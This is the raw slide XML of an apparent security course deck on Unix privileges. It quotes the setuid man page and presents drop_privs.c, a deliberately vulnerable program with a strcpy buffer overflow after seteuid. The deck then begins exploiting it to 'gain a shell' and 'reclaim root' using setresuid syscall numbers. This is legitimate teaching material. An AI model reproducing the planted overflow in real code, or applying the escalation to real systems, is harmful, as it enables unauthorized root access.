          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       Under  Linux,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()  is implemented like the POSIX version with the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       _POSIX_SAVED_IDS feature.  This allows a set-user-ID (other than  root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       program to drop all of its user privileges, do some un-privileged work,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       and then re-engage the original effective user ID in a secure manner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       If the user is root or the program is  set-user-ID-root,  special  care</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       must  be  taken.  The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() function checks the effective user ID of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       the caller and if it is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>superuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, all  process-related  user  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IDâs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       are set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.  After this has occurred, it is impossible for the pro-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       gram to regain root privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       Thus, a set-user-ID-root program wishing to temporarily drop root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,  assume  the  identity of a non-root user, and then regain root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       privileges afterwards cannot use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().   You  can  accomplish  this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       with the (non-POSIX, BSD) call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RETURN VALUE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       On  success,  zero is returned.  On error, -1 is returned, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       set appropriately.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159706320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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>drop_privs.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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a:t>A matter of privilege</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="8352928" cy="2675091"/>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400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lowered_privilege_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(unsigned char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char buffer[50];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(5);  // Drop privileges to games user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lowered_privilege_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233801558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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lets exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>drop_privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and gain a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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a:t>A matter of privilege</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20702343"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reclaim root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Regain privileges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="8352928" cy="4829527"/>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400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reader@hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>booksrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/include/asm-i386/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          164</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __NR_setresuid32        208</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reader@hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>booksrc</a:t>
            </a:r>
            <a:r>
